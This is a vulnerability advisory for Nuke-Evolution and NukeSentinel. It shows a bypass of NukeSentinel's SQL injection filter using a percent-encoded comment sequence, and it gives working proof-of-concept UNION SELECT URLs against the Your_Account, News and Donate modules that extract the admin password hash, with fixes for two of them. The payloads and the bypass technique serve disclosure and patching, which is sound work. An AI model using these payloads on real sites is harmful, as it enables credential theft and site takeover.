PROGRAM: Nuke-Evolution & NukeSentinel HOMEPAGE: http://www.nuke-evolution.com/ VERSION: All versions BUG 1 NukeSentinel Bypass SQL Injection Protection BUG 2 Nuke Evolution <= 2.0.3 SQL injection vulnerabilities AUTHOR: Aleksandar NukeSentinel Bypass SQL Injection Protection nukesentinel.php Line 270-290 ****************************************** // Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } } // Check for CLIKE attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[2]; if($blocker_row['activate'] > 0) { if ( stristr($nsnst_const['query_string'],'/*') OR stristr($nsnst_const['query_string_base64'],'/*') OR stristr($nsnst_const['query_string'],'*/') OR stristr($nsnst_const['query_string_base64'],'*/')) { // block_ip($blocker_row); die("BLOCK IP 2 " ); } } ****************************************** Example (bypass of the SQL injection protection): The sequence %2f**%2f is the percent-encoded form of /**/; the checks above apparently match against the query string as received rather than its URL-decoded form, so none of the '/*', '*/' or '*/union/*' patterns match, and the blocker would need to normalise (decode) the input before comparing. PHPNuke + NukeSentinel http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT ... etc Nuke-Evolution + NukeSentinel http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT .. etc Nuke-Evolution Basic 2.0.3 An open source content management system, which features customizable blocks, modules, multilanguage support and themes, with an emphasis on security, speed and usability. A PHP-Nuke based CMS with added security, functionality, and core improvements. 
Site: http://www.nuke-evolution.com/ Your_Account/index.php Vulnerability code: ******************************************************************** case "userinfo": //include("modules/$module_name/public/userinfo.php"); /*****[BEGIN]****************************************** [ Mod: YA Merge v1.0.0 ] ******************************************************/ //The "$username" variable isn't filtered!!! -- it goes straight into the query below and must be escaped or validated first $result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'

"); $uid = $db->sql_fetchrow($result); Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]); die(); /*****[END]******************************************** [ Mod: YA Merge v1.0.0 ] ******************************************************/ break; ********************************************************************* POC Exploit: http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f** Results: MOZILA FIREFOX URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH MOZILA FIREFOX Live HTTP Headers - Firefox Add-ons http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate News/read_article.php line 66 Vulnerability code: ++++++++++++++++++++++++++++++++++ // //The "'$sid" variable isn't filtered!!! 
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql); ++++++++++++++++++++++++++++++++++ POC Exploit: http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f** FIX ++++++++++++++++++++++++++++++++++ $sid= intval($sid); // FIX $sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'"; $result = $db->sql_query($sql); ++++++++++++++++++++++++++++++++++ Donate/index.php lines 33 & 46 Vulnerability code: ******************************************************** if (is_numeric($uid)) { // LOL :) $uid = intval($uid); :) LOL } .... // Line 46 } elseif (!empty($uid)) { include_once(NUKE_BASE_DIR.'header.php'); $sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM -> SQL injection $result = $db->sql_query($sql); $row = $db->sql_fetchrow($result); $name = $row['username']; ********************************************************** Because the intval() cast on line 33 runs only when is_numeric() is true, a non-numeric $uid skips the cast and reaches the query on line 46 unchanged. POC Exploit: http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1 FIX ++++++++++++++++++++++++++++++++++++++ ///if (is_numeric($uid)) { REMOVE THIS LINE $uid = intval($uid); ///} REMOVE THIS LINE ++++++++++++++++++++++++++++++++++++++ Best Regards Aleksandar Programmer and Web Developer